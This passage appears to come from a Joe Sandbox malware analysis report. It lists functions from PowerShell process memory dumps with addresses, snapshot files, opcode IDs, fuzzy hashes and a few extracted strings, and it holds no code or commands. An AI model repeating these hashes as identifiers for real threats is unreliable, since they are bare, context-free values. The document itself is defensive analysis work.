                                                    • Instruction Fuzzy Hash: D32101B7B084266FD3127BFCAD346DA3B54DB9433474902B2D298DB143E934708A8AC2

                                                    Executed Functions

                                                    Function 00007FFD348A6435 Relevance: .7, Instructions: 715COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2290216100.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fd7934722baa670139b7dee1537acba38a02cb5c3c3a4da1c20a4a06ba8c202e
                                                    • Instruction ID: e369b71673dfd2996aec9523cbc0f3e9b570289bd5d3970f36eab983c87a7ee0
                                                    • Opcode Fuzzy Hash: fd7934722baa670139b7dee1537acba38a02cb5c3c3a4da1c20a4a06ba8c202e
                                                    • Instruction Fuzzy Hash: 27D1B030A08A4D8FDF95DF58C4A4AA97BF1FF69300F14416AD44DE7296CB78E881CB91
                                                    Function 00007FFD34976605 Relevance: .4, Instructions: 434COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2291030253.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4fd5552a16e264f6cc09ad32024aa73d9e6bb5cbb47b87111836023093808709
                                                    • Instruction ID: 171bc6f7e3c65bc44546bdb853c6b2232b6b8181d1f1e37456314dadfb510b48
                                                    • Opcode Fuzzy Hash: 4fd5552a16e264f6cc09ad32024aa73d9e6bb5cbb47b87111836023093808709
                                                    • Instruction Fuzzy Hash: 25D13422A0EA890FEB669B6848B55B57FA0FF56320B0841BED55CC71E7DA1CAC05C361
                                                    Function 00007FFD34974073 Relevance: .2, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2291030253.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b9e33f6ef6486fb7845026283081314baa2391195696c1a023ba5b752a06d95
                                                    • Instruction ID: b8a63ce6f683bc3e9b22698de0c5b1fd23a251a1efcca42cc0e9c36d6df53e55
                                                    • Opcode Fuzzy Hash: 2b9e33f6ef6486fb7845026283081314baa2391195696c1a023ba5b752a06d95
                                                    • Instruction Fuzzy Hash: D5516C33B0CA568FEB95DA1C58B15747BD1EFA6260B0840BFC29DC7197DD28EC058351
                                                    Function 00007FFD348AA848 Relevance: .2, Instructions: 181COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2290216100.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 68ba519c5c715d263be1287ee53fc383873705153e4243accd3507cccc27ca8d
                                                    • Instruction ID: ba291d662890e5c53bdd224dddd0a3584380938d4c526bfa5420b82f1e1f518c
                                                    • Opcode Fuzzy Hash: 68ba519c5c715d263be1287ee53fc383873705153e4243accd3507cccc27ca8d
                                                    • Instruction Fuzzy Hash: 93513B3160DBC54FD74ADB28C8E58A17BE0EF57314B1801AED4D9C7193E92AB803C752
                                                    Function 00007FFD348A9750 Relevance: .2, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2290216100.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d5dfc3cdf9a8492bebc6037f1e8c42473780cba9fb074aad60427c2364559dc0
                                                    • Instruction ID: 5b87e76e898e0027600d290a4447eefe4e4055f13b2875b987ee1c2e78484134
                                                    • Opcode Fuzzy Hash: d5dfc3cdf9a8492bebc6037f1e8c42473780cba9fb074aad60427c2364559dc0
                                                    • Instruction Fuzzy Hash: 03413B7190EB884FD7499F5C9C5A6B9BFE0FB56310F04416FD099C3183CA68A809CBD2
                                                    Function 00007FFD34974370 Relevance: .1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2291030253.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac4ca4bf04156be7e018d6ad06b3a70359f9db43e22fd4a2b78896ac01caa735
                                                    • Instruction ID: ad829b9868c86c4676bcc1bde8c7d08b81a00dac25d2bc77fb52d9058ec22dc8
                                                    • Opcode Fuzzy Hash: ac4ca4bf04156be7e018d6ad06b3a70359f9db43e22fd4a2b78896ac01caa735
                                                    • Instruction Fuzzy Hash: 6F417B32B4DA458FEBA5D65C58A05B47BD1EF42324B0840BFD59DC7197E91CFC009391
                                                    Function 00007FFD3478EF00 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2289528231.00007FFD3478D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3478D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd3478d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5977ed3297d05092e4d94dfea8e88c636e4a48b2811241c9b4ca5b3640f2c1d1
                                                    • Instruction ID: 2fa77145f4cf3ff5556124db3e478b554cd1f08df7164c24092c354591119e0e
                                                    • Opcode Fuzzy Hash: 5977ed3297d05092e4d94dfea8e88c636e4a48b2811241c9b4ca5b3640f2c1d1
                                                    • Instruction Fuzzy Hash: BB41167180DBC48FE7969B2898969523FF0EF53325B1901DFD088CB1A3D629B846C793
                                                    Function 00007FFD348AA75C Relevance: .1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2290216100.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1d52e3ff9a7cf88449cefe876ba91478ed84003d3c7c364b0e44705e60d944db
                                                    • Instruction ID: 89d90e897ad434b2dd4f2c2fea8eb6c1132b53bf0ce49153487ca6e400c5b9d5
                                                    • Opcode Fuzzy Hash: 1d52e3ff9a7cf88449cefe876ba91478ed84003d3c7c364b0e44705e60d944db
                                                    • Instruction Fuzzy Hash: DE310A3190DB8C8FDB55DBA898596EA7FF0EF66321F04416FC148C7163DA78580ACB92
                                                    Function 00007FFD349740BF Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2291030253.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe4a5ebe1d42dd01e86f26aacf8d81ceb1a9a350d0292070f8e63bbbc0d8095e
                                                    • Instruction ID: 38762508f30aed3b4414f2b02c7d3d6db528711c92814d78fb449351195b4c40
                                                    • Opcode Fuzzy Hash: fe4a5ebe1d42dd01e86f26aacf8d81ceb1a9a350d0292070f8e63bbbc0d8095e
                                                    • Instruction Fuzzy Hash: C121F723B0DA978FE7A5EA1C48F05746AD1EF76250B4980BEC29DC71ABCD2CEC059351
                                                    Function 00007FFD349743BC Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2291030253.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4785e32d1e2587bafe7e25b72db28a8dbfd1fed1b315f7717203d6ea573dce6d
                                                    • Instruction ID: 1758766b838e14a776d3358ff92d602626773c09dd939eae7b6715672440edbd
                                                    • Opcode Fuzzy Hash: 4785e32d1e2587bafe7e25b72db28a8dbfd1fed1b315f7717203d6ea573dce6d
                                                    • Instruction Fuzzy Hash: 65110232F8E5458FEBA4DA1C98E05B43AD1FF4232474980BED69DC749BDA2CBC009760
                                                    Function 00007FFD348A33B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2290216100.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction ID: 0c5e5649d06d92c1145b5404b9a75156bb07d5da2bacdf6660bb961c601e6699
                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction Fuzzy Hash: 5C01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651DA36E882CB45

                                                    Non-executed Functions

                                                    Function 00007FFD348A89F2 Relevance: 7.6, Strings: 6, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2290216100.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^$M_^$M_^$M_^$M_^$M_^
                                                    • API String ID: 0-3353809593
                                                    • Opcode ID: 8e10ff5c8e97850c872c35062d619cde2be982b48e3c4455342e7c8014c31b00
                                                    • Instruction ID: abdbb1ee5719ae4aba7bea92185723510d3ff279d8798a8c303cff499bba8298
                                                    • Opcode Fuzzy Hash: 8e10ff5c8e97850c872c35062d619cde2be982b48e3c4455342e7c8014c31b00
                                                    • Instruction Fuzzy Hash: F64154A3B0E6C25BF2DB422908BA0957BD0EF53354B0D06F6C684CA493BD5D68436277
                                                    Function 00007FFD348A8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2290216100.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                    • API String ID: 0-962139525
                                                    • Opcode ID: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
                                                    • Instruction ID: 0d89409c9456d6fc60ab0403801a8cf6c960bb07274d0b8a9fee97d209a9d1ca
                                                    • Opcode Fuzzy Hash: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
                                                    • Instruction Fuzzy Hash: 5921F273B045259AC21236FCB8619D97794DF5437838A03F3E028DF193F978B48B8A80

                                                    Executed Functions

                                                    Function 00007FFD348A6435 Relevance: .7, Instructions: 716COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.2427179976.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 48b10c8a9cf0d2ef772d1ed38869a4c6ac902dd6a54fa472ba9a80445c0f8be6
                                                    • Instruction ID: 32c0cdf0c9457424c7cf862f5f8abc6b20457ce94177bd81202652e4a659db0e
                                                    • Opcode Fuzzy Hash: 48b10c8a9cf0d2ef772d1ed38869a4c6ac902dd6a54fa472ba9a80445c0f8be6
                                                    • Instruction Fuzzy Hash: FED1A130A08A4D8FDF95DF58C4A4AA977F1FF69300F14416AD44DE7296CB78E881CB91
                                                    Function 00007FFD34976605 Relevance: .4, Instructions: 434COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.2427885498.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b1c16f6df905cc5f467a6147eedde189328fb8ec32a0272762194f7c2202dd08
                                                    • Instruction ID: 41ed39c985c8af167794b7eaf0c616b59a242cd8e442b107873364498530dae9
                                                    • Opcode Fuzzy Hash: b1c16f6df905cc5f467a6147eedde189328fb8ec32a0272762194f7c2202dd08
                                                    • Instruction Fuzzy Hash: 21D13332A0EA890FEBA59B6848B55B57FE1FF56220B0841FED55CC70E7DA1CAC05C361
                                                    Function 00007FFD34974073 Relevance: .2, Instructions: 182COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.2427885498.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9bb196ebfa251d11f3afc2b5c0e13c9c126c0cd8d7c5552eb14362bcd9778a34
                                                    • Instruction ID: 64570460a038ad7f0dda092a7610c11124852a561487696a56d6d78fd2711df5
                                                    • Opcode Fuzzy Hash: 9bb196ebfa251d11f3afc2b5c0e13c9c126c0cd8d7c5552eb14362bcd9778a34
                                                    • Instruction Fuzzy Hash: 83515B33B0DA568FEB99DA1C58B15747BD2EFA6260B0840BFC29DC7197DE28EC058351
                                                    Function 00007FFD348A9738 Relevance: .2, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.2427179976.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26481063979216ba14443b65b4eb86e0a6e398cd8a490cf8fe0006560d593bfb
                                                    • Instruction ID: c9164f31af7590ac77064aaac069ed12ff9eca044bf9cebc50d1c5ef3809e14b
                                                    • Opcode Fuzzy Hash: 26481063979216ba14443b65b4eb86e0a6e398cd8a490cf8fe0006560d593bfb
                                                    • Instruction Fuzzy Hash: D0416B31A0DA884FDB48EF4C98966B9BBE0FB55310F04412FE449D3292DB64F816CBD2
                                                    Function 00007FFD3478EC60 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.2426337478.00007FFD3478D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3478D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7ffd3478d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c921566318921e20f4b77310ee8149388cd616fbb6b0872647f403bdee39c185
                                                    • Instruction ID: a074f7ba0300aae393ad760beff874107e70f5e314de4d6bfb68ca2657468085
                                                    • Opcode Fuzzy Hash: c921566318921e20f4b77310ee8149388cd616fbb6b0872647f403bdee39c185
                                                    • Instruction Fuzzy Hash: E1413B7080DBC48FD7568B2998959523FF0EF57325B1905DFD088CB1A3C729B84AC792
                                                    Function 00007FFD348AA49C Relevance: .1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.2427179976.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 393b761a7907c9392c36bd501a5ab2f9dffbc8dac569e9a0c23f25a36f978872
                                                    • Instruction ID: af0dc9b9e26f3202cf13b13ae1b8b059b6c04315ddeac64da2c4e8c2e6eac800
                                                    • Opcode Fuzzy Hash: 393b761a7907c9392c36bd501a5ab2f9dffbc8dac569e9a0c23f25a36f978872
                                                    • Instruction Fuzzy Hash: 2B21F83190CB8C4FDB59DBAC988A7E97FF0EB96321F04416FD048C3152DA74A816CB92
                                                    Function 00007FFD349740BF Relevance: .1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.2427885498.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9201cf577b24daef1b130b8c98dae4604623674d68194ac75beea229e282ae1c
                                                    • Instruction ID: 0f24d1bccd31f1f1469c89ea6ec8d61eb98cef5fc28a4e004fcae79ff3045447
                                                    • Opcode Fuzzy Hash: 9201cf577b24daef1b130b8c98dae4604623674d68194ac75beea229e282ae1c
                                                    • Instruction Fuzzy Hash: 49210923B0DA578FE7A5EA1C48F05706AD1EF62350B4980BED19DC75ABCD2CEC049311
                                                    Function 00007FFD348A33B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.2427179976.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction ID: 0c5e5649d06d92c1145b5404b9a75156bb07d5da2bacdf6660bb961c601e6699
                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction Fuzzy Hash: 5C01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651DA36E882CB45
                                                    Function 00007FFD34974400 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.2427885498.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5809c6d475dc63004c0e9ca0ef5b57f08af091edafda202d7173529332872607
                                                    • Instruction ID: 341f2744217fdda2cdcc3031270fe960ca5768430174b30f5cd712822541576c
                                                    • Opcode Fuzzy Hash: 5809c6d475dc63004c0e9ca0ef5b57f08af091edafda202d7173529332872607
                                                    • Instruction Fuzzy Hash: EBF0BE32A4D5448FDB58EB4CE8904A877E0FF0632474140BAE28DC70A3DA2AAC44DB50

                                                    Non-executed Functions

                                                    Function 00007FFD348A8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.2427179976.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^4$M_^7$M_^F$M_^J
                                                    • API String ID: 0-622050427
                                                    • Opcode ID: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                    • Instruction ID: 9c0c05f8c333faab2dea8e5433de44f93eadbb4ada4e22e1690e82e5527060d5
                                                    • Opcode Fuzzy Hash: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                    • Instruction Fuzzy Hash: 9B21F2A7708465AED3127BFDA8249EA3754CF9433478917B2E198DB083F92870868AD0

                                                    Executed Functions

                                                    Function 00007FFD348A9574 Relevance: .4, Instructions: 405COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2629416770.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 473a617c49b0497dc8a210628181641c2ac10ff9d6ec80c96a92b41eb451a707
                                                    • Instruction ID: 7ecfc4fdc158dcf63016367262cd400e3c80181d2762ce28390b3469156a7bf9
                                                    • Opcode Fuzzy Hash: 473a617c49b0497dc8a210628181641c2ac10ff9d6ec80c96a92b41eb451a707
                                                    • Instruction Fuzzy Hash: 70D1FA62A0F7C64FE752976C58BA1A97FA0EF53214B0C01FBC5D8CB093DD5CA8069762
                                                    Function 00007FFD34976605 Relevance: .4, Instructions: 434COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2631203965.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0b754d7481633081d410ffff2d8517e90a53cecaac540b6c20f496da9f6894c8
                                                    • Instruction ID: d2020000e66b57db97ab54472c149c3bc93680a6af55c58b9348f06ef5b139b8
                                                    • Opcode Fuzzy Hash: 0b754d7481633081d410ffff2d8517e90a53cecaac540b6c20f496da9f6894c8
                                                    • Instruction Fuzzy Hash: 53D14332A0EA890FEBA59B6848B55B57FE0FF56220B0841FED55DCB0E7DA1CAC05C351
                                                    Function 00007FFD34974073 Relevance: .2, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2631203965.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 692c3ad974a93c5817eda8b9a8c23398983ddf48fd18ba668f34bf1d5440fd68
                                                    • Instruction ID: 4c8845bbcabd88874297b07dc9c6ea89fd9ff186ae227260284b9c637697ae17
                                                    • Opcode Fuzzy Hash: 692c3ad974a93c5817eda8b9a8c23398983ddf48fd18ba668f34bf1d5440fd68
                                                    • Instruction Fuzzy Hash: C4516C33B0CA968FE7A5EA1C58B15747BD1EFA6260B1840BFC28DC7197DD29EC018351
                                                    Function 00007FFD34974370 Relevance: .1, Instructions: 149COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2631203965.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5850daf435abf7daed44ba77592998071977b515419a22b9223ffa8be8c86376
                                                    • Instruction ID: 789c5637d7c17024641b91a03864f524a95b7260509595d0b4340f188ccf8506
                                                    • Opcode Fuzzy Hash: 5850daf435abf7daed44ba77592998071977b515419a22b9223ffa8be8c86376
                                                    • Instruction Fuzzy Hash: D6415732B0DA898FEBA5D66C58A05B47BD1EF86324B0840BFC28DC7187E91DFC009391
                                                    Function 00007FFD3478ED40 Relevance: .1, Instructions: 125COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2627422451.00007FFD3478D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3478D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd3478d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 003103693d794e08a3cf8ad2d772bf663cdeddb7846a4b205ff8992cde963160
                                                    • Instruction ID: d9f8c1bf6d2926c78c0f42ce2e75b2321d5d14eafd2f9d4f3ade7a90e5b5236c
                                                    • Opcode Fuzzy Hash: 003103693d794e08a3cf8ad2d772bf663cdeddb7846a4b205ff8992cde963160
                                                    • Instruction Fuzzy Hash: 9941187041DBC48FE7978B2898969523FF0EF53321B1505DFD088CB1A3D629A84AC7A3
                                                    Function 00007FFD348AA525 Relevance: .1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2629416770.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2ae3a01508f30cede633856974d05c476139d547965144999846140da05ada6
                                                    • Instruction ID: 0962ff65dfd8ac79f15da0c30d11f7262c77f4c811d3b062404d6664720e084e
                                                    • Opcode Fuzzy Hash: a2ae3a01508f30cede633856974d05c476139d547965144999846140da05ada6
                                                    • Instruction Fuzzy Hash: 0031E83190C7884FDB55DB68985A7E97FF0EF96320F0481AFD148D7163D678580ACB92
                                                    Function 00007FFD349740BF Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2631203965.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37e3942202939bb8c52b99d1d06cd84b159ed3b0565555e6cedab0393d965840
                                                    • Instruction ID: d6d6e6b152cea872a069a2bf346761a4da173928a6082c34c33376fb60535f3b
                                                    • Opcode Fuzzy Hash: 37e3942202939bb8c52b99d1d06cd84b159ed3b0565555e6cedab0393d965840
                                                    • Instruction Fuzzy Hash: 6721F623B0DA978FE7A5EA1848F05746AD1EF72250B4980BEC29DC719BCD2CEC059351
                                                    Function 00007FFD348AA56C Relevance: .1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2629416770.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: add2667aeea2c9f656a2cd57035088ef18349e919c1926a4df8f219f6c0f2f29
                                                    • Instruction ID: 95c53e12e2e352d2eb1484a4f1278c03b04f6a506aa0070a3affb87d34327b47
                                                    • Opcode Fuzzy Hash: add2667aeea2c9f656a2cd57035088ef18349e919c1926a4df8f219f6c0f2f29
